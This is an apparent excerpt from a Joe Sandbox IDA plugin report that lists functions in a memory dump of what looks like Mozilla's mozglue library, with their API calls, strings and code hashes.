Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease_getpidfreemoz_xmalloc
String ID: [D %d/%d] profiler_register_page(%llu, %llu, %s, %llu)
API String ID: 3012294017-637075127
Opcode ID: 61ae18c85400d1b1e5631a1b8b43db24be66bae2ee8d278f693b0ff382fabe65
Instruction ID: 34d887fcf9b428f13417ee05919d02eeb1bd958e5d4be28bb25c3c4c6937c956
Opcode Fuzzy Hash: 61ae18c85400d1b1e5631a1b8b43db24be66bae2ee8d278f693b0ff382fabe65
Instruction Fuzzy Hash: 6C417AB5A002049FCB18CF64D881A9BBFF9FF49214F40451AED5A83750E735E805CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6B072030 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 204memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,6B093F47,?,?,?,6B093F47,6B091A70,?), ref: 6B07207F
memset.VCRUNTIME140(?,000000E5,6B093F47,?,6B093F47,6B091A70,?), ref: 6B0720DD
VirtualFree.KERNEL32(00100000,00100000,00004000,?,6B093F47,6B091A70,?), ref: 6B07211A
EnterCriticalSection.KERNEL32(6B0FE744,?,6B093F47,6B091A70,?), ref: 6B072145
VirtualAlloc.KERNEL32(?,00100000,00001000,00000004,?,6B093F47,6B091A70,?), ref: 6B0721BA
EnterCriticalSection.KERNEL32(6B0FE744,?,6B093F47,6B091A70,?), ref: 6B0721E0
LeaveCriticalSection.KERNEL32(6B0FE744,?,6B093F47,6B091A70,?), ref: 6B072232

Strings

MOZ_RELEASE_ASSERT(node->mArena == this), xrefs: 6B072253, 6B072268
MOZ_CRASH(), xrefs: 6B07227D

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: CriticalSection$EnterVirtual$AllocFreeLeavememcpymemset
String ID: MOZ_CRASH()$MOZ_RELEASE_ASSERT(node->mArena == this)
API String ID: 889484744-884734703
Opcode ID: c85bfba23becae29d94ee9507a9c4ec5d5d1c5a131b338f95d5884bc11e351eb
Instruction ID: a8b00f4b08f11dc848fdae0a96711f80208c5633b938919bea965e10b6d72d1c
Opcode Fuzzy Hash: c85bfba23becae29d94ee9507a9c4ec5d5d1c5a131b338f95d5884bc11e351eb
Instruction Fuzzy Hash: D961E231F002168FCB28DE78C885B6EBFF6BF96314F158179E924A7294D738D801CA95

Uniqueness

Uniqueness Score: -1.00%

Function 6B0748E0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(8E8DFFFF,?,6B0B483A,?), ref: 6B074ACB
memcpy.VCRUNTIME140(-00000023,?,8E8DFFFF,?,?,6B0B483A,?), ref: 6B074AE0
moz_xmalloc.MOZGLUE(FFFE15BF,?,6B0B483A,?), ref: 6B074A82

Part of subcall function 6B08CA10: mozalloc_abort.MOZGLUE(?), ref: 6B08CAA2

memcpy.VCRUNTIME140(-00000023,?,FFFE15BF,?,?,6B0B483A,?), ref: 6B074A97
moz_xmalloc.MOZGLUE(15D4E801,?,6B0B483A,?), ref: 6B074A35

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

memcpy.VCRUNTIME140(-00000023,?,15D4E801,?,?,6B0B483A,?), ref: 6B074A4A
moz_xmalloc.MOZGLUE(15D4E824,?,6B0B483A,?), ref: 6B074AF4
moz_xmalloc.MOZGLUE(FFFE15E2,?,6B0B483A,?), ref: 6B074B10
moz_xmalloc.MOZGLUE(8E8E0022,?,6B0B483A,?), ref: 6B074B2C

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: moz_xmalloc$memcpy$mallocmozalloc_abort
String ID:
API String ID: 4251373892-0
Opcode ID: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction ID: f1cca6c154191f45754655446de4081585f911ace3e80387398135ebb9c93961
Opcode Fuzzy Hash: 5d8f15a46075c6f23e74a93108e1c775b8c62672de11371df24fb4108a31228e
Instruction Fuzzy Hash: 70716DB1900706AFCB68DF78C481AAAFBF5FF08308B50467ED55A8B641E735E655CB80

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CAB90 Relevance: 13.6, APIs: 9, Instructions: 135threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0CABB4
AcquireSRWLockExclusive.KERNEL32(6B084A63), ref: 6B0CABC0
ReleaseSRWLockExclusive.KERNEL32 ref: 6B0CAC06
GetCurrentThreadId.KERNEL32 ref: 6B0CAC16
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CAC27
ReleaseSRWLockExclusive.KERNEL32 ref: 6B0CAC66
free.MOZGLUE(?), ref: 6B0CAD19
free.MOZGLUE(00000000), ref: 6B0CAD2B
?_Xbad_function_call@std@@YAXXZ.MSVCP140(00000000), ref: 6B0CAD38

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree$Xbad_function_call@std@@
String ID:
API String ID: 2167474191-0
Opcode ID: 2989aa79d9b93b961fdd5f6b40fff2ff2fbdfcbda9a84788d2f58632e14d5712
Instruction ID: 0d1822dc80e107a2c0d1c3ba82b77d512061a46a58d95b9635c54d9f8b575bde
Opcode Fuzzy Hash: 2989aa79d9b93b961fdd5f6b40fff2ff2fbdfcbda9a84788d2f58632e14d5712
Instruction Fuzzy Hash: E7514674600B058FC728DF25C48875ABBF6BF89314F204A1DE9AA87765EB35F844CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CCB30 Relevance: 13.6, APIs: 9, Instructions: 129COMMON

Download Yara Rule

APIs

?_Fiopen@std@@YAPAU_iobuf@@PBDHH@Z.MSVCP140(00000000,00000002,00000040,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCB52
?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCB82
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCB8D
??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCBA4
?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCBC4
?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCBE9
std::_Facet_Register.LIBCPMT ref: 6B0CCBFB
??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCC20
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,6B0CBCAE,?,?,6B0BDC2C), ref: 6B0CCC65

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
String ID:
API String ID: 2325513730-0
Opcode ID: acb3eabe83876f3a0ea44489d87a95791bfbb6c765ca28a0610bf8e119c5cdf6
Instruction ID: 70e517a8edbbe3b3e049cf80ca27aff91f8f400a7656b2f67b2f1dcb80fc4738
Opcode Fuzzy Hash: acb3eabe83876f3a0ea44489d87a95791bfbb6c765ca28a0610bf8e119c5cdf6
Instruction Fuzzy Hash: 9A4161307002059FCB14DF64C899B5E7FF9AF89354F044068E90A97352EB39D845CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6B07BAE0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 183COMMON

Download Yara Rule

APIs

?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6B07BC03
?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6B07BD06

Strings

0, xrefs: 6B07BC74
0, xrefs: 6B07BBCD
y, xrefs: 6B07BC4E

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
String ID: 0$0$y
API String ID: 2811501404-3020536412
Opcode ID: a89275c32f9f0079a09e258357eb7a58c7c80da0b12ec24513f75a7a01a8f335
Instruction ID: f5e33cf6076c2fa82afe6e17bb5856b4543435def790489362eacad66dd63bc7
Opcode Fuzzy Hash: a89275c32f9f0079a09e258357eb7a58c7c80da0b12ec24513f75a7a01a8f335
Instruction Fuzzy Hash: 1D61C371A083448FC728EF38C5A175BFBE5FF89384F008A6EE88597251EB34D9458796

Uniqueness

Uniqueness Score: -1.00%

Function 6B080A60 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0000000C,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080A72

Part of subcall function 6B08CA10: malloc.MOZGLUE(?), ref: 6B08CA26

moz_xmalloc.MOZGLUE(?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080AF5
free.MOZGLUE(00000000,?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080B9F
free.MOZGLUE(?,?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080BDB
free.MOZGLUE(00000000,?,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080BED
mozalloc_abort.MOZGLUE(alloc overflow,?,6B0DB80C,00000000,?,?,6B08003B,?), ref: 6B080C0A

Strings

alloc overflow, xrefs: 6B080C05

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$moz_xmalloc$mallocmozalloc_abort
String ID: alloc overflow
API String ID: 1471638834-749304246
Opcode ID: 1f9952f8d87be3784e7841dcd6424da9879ac307f71b03ad2404a5e6d0577b6c
Instruction ID: 53db57db8543686a8b06e0826ed972af0c2bb1e4c9434944165b7409f79f97ee
Opcode Fuzzy Hash: 1f9952f8d87be3784e7841dcd6424da9879ac307f71b03ad2404a5e6d0577b6c
Instruction Fuzzy Hash: C951B2B4A052068FDF28CF28D8C0B5EBBB6FF48308F54496DC45A9B211FB75A644CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6B0778C0 Relevance: 12.3, APIs: 8, Instructions: 320COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,6B0F008B), ref: 6B077B89
free.MOZGLUE(?,6B0F008B), ref: 6B077BAC

Part of subcall function 6B0778C0: free.MOZGLUE(?,6B0F008B), ref: 6B077BCF

free.MOZGLUE(?,6B0F008B), ref: 6B077BF2

Part of subcall function 6B095E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6B095EDB
Part of subcall function 6B095E90: memset.VCRUNTIME140(ewk,000000E5,?), ref: 6B095F27
Part of subcall function 6B095E90: LeaveCriticalSection.KERNEL32(?), ref: 6B095FB2

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$CriticalSection$EnterLeavememset
String ID:
API String ID: 3977402767-0
Opcode ID: de13096f30fd9cd7c24488829bfc26b80d88861ff97f1a05bc85c23831600c27
Instruction ID: d28cfd679e77c0e3b6dc7f746cb1056e49d27dff7cd5197460f3e72a09e426ec
Opcode Fuzzy Hash: de13096f30fd9cd7c24488829bfc26b80d88861ff97f1a05bc85c23831600c27
Instruction Fuzzy Hash: 7CC1AF71E011288BEB3CAB28CC90B9DFB72EF45354F1006F9D51AAB381D7399E848B55

Uniqueness

Uniqueness Score: -1.00%

Function 6B0C1220 Relevance: 12.2, APIs: 8, Instructions: 173threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6B0C124B
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6B0C1268
GetCurrentThreadId.KERNEL32 ref: 6B0C12DA
InitializeConditionVariable.KERNEL32(?), ref: 6B0C134A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6B0C138A
?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6B0C1431

Part of subcall function 6B0B8AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6B0D1563), ref: 6B0B8BD5

free.MOZGLUE(?), ref: 6B0C145A
free.MOZGLUE(?), ref: 6B0C146C

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
String ID:
API String ID: 2803333873-0
Opcode ID: b80fd647d54fb5d324f65079096efe1c340e97f575fb3654596546864ec3abf6
Instruction ID: a0bf75bd810656a8f55abada55a98205f685f216534762c23d611182ec3cec64
Opcode Fuzzy Hash: b80fd647d54fb5d324f65079096efe1c340e97f575fb3654596546864ec3abf6
Instruction Fuzzy Hash: AB61BE75A043049BDB18DF24D880B9FBBE6BFC5308F00895DE99957212EB39E495CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6B074B50 Relevance: 12.2, APIs: 8, Instructions: 164COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074C63
free.MOZGLUE(?,?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074C89
free.MOZGLUE(?,?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074CAC
free.MOZGLUE(?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074CCF
free.MOZGLUE(?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074CF2
free.MOZGLUE(?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074D15
free.MOZGLUE(?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074D38
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6B074667,?,?,?,?,?,?,?,?,6B0B4843,?), ref: 6B074DD1

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1497960986-0
Opcode ID: 9085cd2112742312f40b283f34349dbc68bd1e17c428f13fc6c528b83468a7e8
Instruction ID: d1806dd078e97f795c9051b2a6ea5ca46611db64178f30620f22e211b98b999f
Opcode Fuzzy Hash: 9085cd2112742312f40b283f34349dbc68bd1e17c428f13fc6c528b83468a7e8
Instruction Fuzzy Hash: 02516971504A409FE33CAA3CD96875EFFA2AF01724F404A2DE197C7BD1D339A8448B45

Uniqueness

Uniqueness Score: -1.00%

Function 6B07E9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,6B081999), ref: 6B07EA39
memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6B07EA5C
memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6B07EA76
moz_xmalloc.MOZGLUE(-00000001,?,?,6B081999), ref: 6B07EA9D
memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6B081999), ref: 6B07EAC2
memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6B07EADC
free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6B07EB0B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6B07EB27

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 706364981-0
Opcode ID: 797ff789b07874307b4cb8efb5dc0f3d47686a341d1ea642fb5090a23ddb666b
Instruction ID: f72b6eca6cfe532a7edc0be5d667725bb30cce2f24ce126ed3d103fc74f280ca
Opcode Fuzzy Hash: 797ff789b07874307b4cb8efb5dc0f3d47686a341d1ea642fb5090a23ddb666b
Instruction Fuzzy Hash: 9141E3B1A00215EFDB28DF68DC81BAEBFB9BF44214F140678E815D7394E735EA0087A5

Uniqueness

Uniqueness Score: -1.00%

Function 6B0CD310 Relevance: 12.1, APIs: 8, Instructions: 132threadtimeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6B0CD36B
GetCurrentThreadId.KERNEL32 ref: 6B0CD38A
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD39D
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6B0CD3E1
free.MOZGLUE ref: 6B0CD408

Part of subcall function 6B0ACBE8: GetCurrentProcess.KERNEL32(?,6B0731A7), ref: 6B0ACBF1
Part of subcall function 6B0ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6B0731A7), ref: 6B0ACBFA

GetCurrentThreadId.KERNEL32 ref: 6B0CD44B
AcquireSRWLockExclusive.KERNEL32(?), ref: 6B0CD457
ReleaseSRWLockExclusive.KERNEL32(?,?), ref: 6B0CD472

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: ExclusiveLock$Current$AcquireProcessReleaseThread$StampTerminateTimeV01@@Value@mozilla@@free
String ID:
API String ID: 3843575911-0
Opcode ID: b047b428fb3ffc33224de34135d0cb9d87791231ba3f9ddcce50a4bdbd667d07
Instruction ID: 2664e65270ac0a56a37df6f3877351dd063b9df72a0cd40833e65209ddfc9541
Opcode Fuzzy Hash: b047b428fb3ffc33224de34135d0cb9d87791231ba3f9ddcce50a4bdbd667d07
Instruction Fuzzy Hash: 354188756043059FCB18DF64D488B9FBFE9BF85314F104A2AEA5287240EB39E945CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6B07EF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(6B0F5104), ref: 6B07EFAC
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6B07EFD7
memcpy.VCRUNTIME140(00000000,?,?), ref: 6B07EFEC
free.MOZGLUE(?), ref: 6B07F00C
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6B07F02E
memcpy.VCRUNTIME140(00000000,?), ref: 6B07F041
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6B07F065
moz_xmalloc.MOZGLUE ref: 6B07F072

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 1148890222-0
Opcode ID: 3ae31dde828bb0c1bf40b7b5687846453a81be641bc3d11aa5316e33c23b5273
Instruction ID: 7d82b8d93bfbfe48b921d7c8af174c288fb92f34f4d64bff2f76349c46dfafe6
Opcode Fuzzy Hash: 3ae31dde828bb0c1bf40b7b5687846453a81be641bc3d11aa5316e33c23b5273
Instruction Fuzzy Hash: F641EBB1A001059FCB1CDF78D8816AE7B69BF84314B244278E815D7394EB35D911C7E5

Uniqueness

Uniqueness Score: -1.00%

Function 6B089830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON

Download Yara Rule

APIs

free.MOZGLUE(?,?,?,6B0D7ABE), ref: 6B08985B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6B0D7ABE), ref: 6B0898A8
moz_xmalloc.MOZGLUE(00000020), ref: 6B089909
memcpy.VCRUNTIME140(00000023,?,?), ref: 6B089918
free.MOZGLUE(?), ref: 6B089975

Memory Dump Source

Source File: 00000001.00000002.3000094745.000000006B071000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6B070000, based on PE: true

Associated: 00000001.00000002.3000073882.000000006B070000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000197438.000000006B0FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.3000228746.000000006B102000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6b070000_u3bs.jbxd

Similarity

API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
String ID:
API String ID: 1281542009-0
Opcode ID: a6fe565b9f6840b78b9573892a5fa3cfa17f171f9f0a0357ff41ef8b8542ccfb
Instruction ID: 2cb923bacfe08206ed1ac811cff4a222f820e7cee685bbd27b1d2fa86e04558c
Opcode Fuzzy Hash: a6fe565b9f6840b78b9573892a5fa3cfa17f171f9f0a0357ff41ef8b8542ccfb
Instruction Fuzzy Hash: D4719B74600706CFCB29DF28D480A56BBF1FF4A324B505AADD89A8B791D735F901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6B0B4AD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 139stringCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4B48
free.MOZGLUE(?,?,?,80000000,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4B7F
memcpy.VCRUNTIME140(00000000,?,?,80000000,?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4B94
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,6B0B4AB7,?,6B0743CF,?,6B0742D2), ref: 6B0B4BBC
